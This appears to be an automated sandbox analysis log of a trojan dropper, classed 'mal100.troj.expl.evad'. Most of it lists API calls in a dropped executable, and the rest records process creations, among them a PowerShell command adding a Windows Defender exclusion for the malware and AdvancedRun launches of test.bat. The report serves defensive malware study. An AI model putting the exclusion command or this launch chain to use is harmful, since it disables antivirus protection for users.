Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AD7CA RtlImageNtHeader,RtlFreeHeap,ZwCreateSection,ZwMapViewOfSection,ZwClose,RtlImageNtHeader,ZwClose,RtlFreeHeap,ZwClose,ZwClose,ZwUnmapViewOfSection, 24_2_6B4AD7CA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F7C0 EtwNotificationUnregister,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwClose,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,EtwNotificationUnregister, 24_2_6B47F7C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B97C0 ZwTerminateProcess, 24_2_6B4B97C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 24_2_6B4ADFDF
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAFD0 ZwShutdownWorkerFactory, 24_2_6B4BAFD0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A37EB RtlImageNtHeader,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,ZwCreateIoCompletion,ZwCreateWorkerFactory,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwSetInformationWorkerFactory, 24_2_6B4A37EB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B480FFD RtlInitUnicodeString,ZwQueryValueKey, 24_2_6B480FFD
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B500FEC ZwDuplicateObject,ZwDuplicateObject, 24_2_6B500FEC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B505780 DbgPrompt,ZwWow64DebuggerCall, 24_2_6B505780
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B525F87 ZwUnmapViewOfSection, 24_2_6B525F87
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AFF9C RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlInitUnicodeString, 24_2_6B4AFF9C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4FA7AC ZwCompareSigningLevels,ZwCompareSigningLevels, 24_2_6B4FA7AC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B97A0 ZwUnmapViewOfSection, 24_2_6B4B97A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B3FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 24_2_6B4B3FA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B472FB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B506652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 24_2_6B506652
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 24_2_6B4BB640
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BB650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 24_2_6B4BB650
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9650 ZwQueryValueKey, 24_2_6B4B9650
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ABE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 24_2_6B4ABE62
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAE70 ZwSetInformationWorkerFactory, 24_2_6B4BAE70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9670 ZwQueryInformationProcess, 24_2_6B4B9670
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B502E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B502E14
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 24_2_6B47C600
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B2E1C RtlInitializeCriticalSectionEx,ZwDelayExecution, 24_2_6B4B2E1C
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9610 ZwEnumerateValueKey, 24_2_6B4B9610
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9E20 ZwCancelTimer2, 24_2_6B4B9E20
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B52FE3F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B543E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 24_2_6B543E22
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B630 ZwWaitForKeyedEvent, 24_2_6B47B630
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9E30 ZwCancelWaitCompletionPacket, 24_2_6B4B9E30
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548ED6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B96C0 ZwSetInformationProcess, 24_2_6B4B96C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4766D4 RtlInitUnicodeString,ZwQueryValueKey, 24_2_6B4766D4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A9ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 24_2_6B4A9ED0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B96D0 ZwCreateKey, 24_2_6B4B96D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 24_2_6B472ED8
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5016FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 24_2_6B5016FA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B96E0 ZwFreeVirtualMemory, 24_2_6B4B96E0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49E6F9 ZwAlpcSetInformation, 24_2_6B49E6F9
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4876FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose, 24_2_6B4876FE
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 24_2_6B47B6F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4CDEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 24_2_6B4CDEF0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B473E80
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 24_2_6B52BE9B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ADE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 24_2_6B4ADE9E
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472E9F ZwCreateEvent,ZwClose, 24_2_6B472E9F
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B543EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 24_2_6B543EBC
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9EA0 ZwCompareSigningLevels, 24_2_6B4B9EA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B502EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B502EA3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 24_2_6B49E6B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B541D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 24_2_6B541D55
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A0548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 24_2_6B4A0548
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501D43 ZwQueryInformationThread, 24_2_6B501D43
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 24_2_6B501570
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B536D61 ZwAllocateVirtualMemoryEx, 24_2_6B536D61
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501D6A ZwWaitForMultipleObjects, 24_2_6B501D6A
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9D70 ZwAlpcQueryInformation, 24_2_6B4B9D70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501D0B ZwSetInformationProcess, 24_2_6B501D0B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BAD10 ZwSetCachedSigningLevel, 24_2_6B4BAD10
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548D34
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A1520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B4A1520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9520 ZwWaitForSingleObject, 24_2_6B4B9520
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FD22 ZwQueryInformationProcess,RtlUniform, 24_2_6B52FD22
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4A4D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 24_2_6B4A4D3B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52FDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B52FDD3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B474DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 24_2_6B474DC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B95C0 ZwSetEvent, 24_2_6B4B95C0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49EDC4 ZwCancelWaitCompletionPacket, 24_2_6B49EDC4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4745D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 24_2_6B4745D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B95D0 ZwClose, 24_2_6B4B95D0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B52BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 24_2_6B52BDFA
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9DE0 ZwAssociateWaitCompletionPacket, 24_2_6B4B9DE0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4795F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 24_2_6B4795F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B95F0 ZwQueryInformationFile, 24_2_6B4B95F0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B48DD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData, 24_2_6B48DD80
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531582 ZwTraceEvent, 24_2_6B531582
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B53B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B53B581
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B473591 ZwSetInformationFile, 24_2_6B473591
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4765A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 24_2_6B4765A0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9DA0 ZwAlpcSendWaitReceivePort, 24_2_6B4B9DA0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B95B0 ZwSetInformationThread, 24_2_6B4B95B0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9DB0 ZwAlpcSetInformation, 24_2_6B4B9DB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9C40 ZwAllocateVirtualMemoryEx, 24_2_6B4B9C40
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 24_2_6B475450
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501C49 ZwQueryInformationProcess, 24_2_6B501C49
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548C75
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6B49746D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501C76 ZwQueryInformationProcess, 24_2_6B501C76
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AAC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 24_2_6B4AAC7B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B523C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 24_2_6B523C60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 24_2_6B4B5C70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9C70 ZwAlpcConnectPort, 24_2_6B4B9C70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548C14
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531411 ZwTraceEvent, 24_2_6B531411
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B0413 ZwUnmapViewOfSection, 24_2_6B4B0413
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose, 24_2_6B47E420
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA420 ZwGetNlsSectionPtr, 24_2_6B4BA420
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49FC39 ZwAssociateWaitCompletionPacket, 24_2_6B49FC39
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548CD6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx, 24_2_6B4ACCC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472CDB RtlFreeHeap,ZwClose,ZwSetEvent, 24_2_6B472CDB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 24_2_6B47F4E3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5314FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B5314FB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5264FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 24_2_6B5264FB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501CE4 ZwQueryInformationProcess, 24_2_6B501CE4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 24_2_6B534496
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA480 ZwInitializeNlsFiles, 24_2_6B4BA480
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 24_2_6B4F3C93
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47EC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose, 24_2_6B47EC9B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B549CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B549CB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B0CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 24_2_6B4B0CA1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B544CAB ZwTraceControl, 24_2_6B544CAB
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 26_2_02A948D8 NtAllocateVirtualMemory, 26_2_02A948D8
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 26_2_02A948D0 NtAllocateVirtualMemory, 26_2_02A948D0
Source: 8615.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 77DC.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 66A4.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 152F.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: bejhieg.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: cnv622JnZv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jejhieg Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@41/20@58/8
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306
Source: cnv622JnZv.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 25_2_0040A33B
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
Source: C:\Users\user\AppData\Roaming\jejhieg Process created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\66A4.exe C:\Users\user\AppData\Local\Temp\66A4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\77DC.exe C:\Users\user\AppData\Local\Temp\77DC.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8615.exe C:\Users\user\AppData\Local\Temp\8615.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe C:\Users\user\AppData\Local\Temp\977B.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A557.exe C:\Users\user\AppData\Local\Temp\A557.exe
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B084.exe C:\Users\user\AppData\Local\Temp\B084.exe
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\152F.exe C:\Users\user\AppData\Local\Temp\152F.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2E26.exe C:\Users\user\AppData\Local\Temp\2E26.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe 'C:\Users\user\AppData\Local\Temp\977B.exe'
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe' Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\66A4.exe C:\Users\user\AppData\Local\Temp\66A4.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\77DC.exe C:\Users\user\AppData\Local\Temp\77DC.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8615.exe C:\Users\user\AppData\Local\Temp\8615.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe C:\Users\user\AppData\Local\Temp\977B.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A557.exe C:\Users\user\AppData\Local\Temp\A557.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\jejhieg Process created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe Jump to behavior
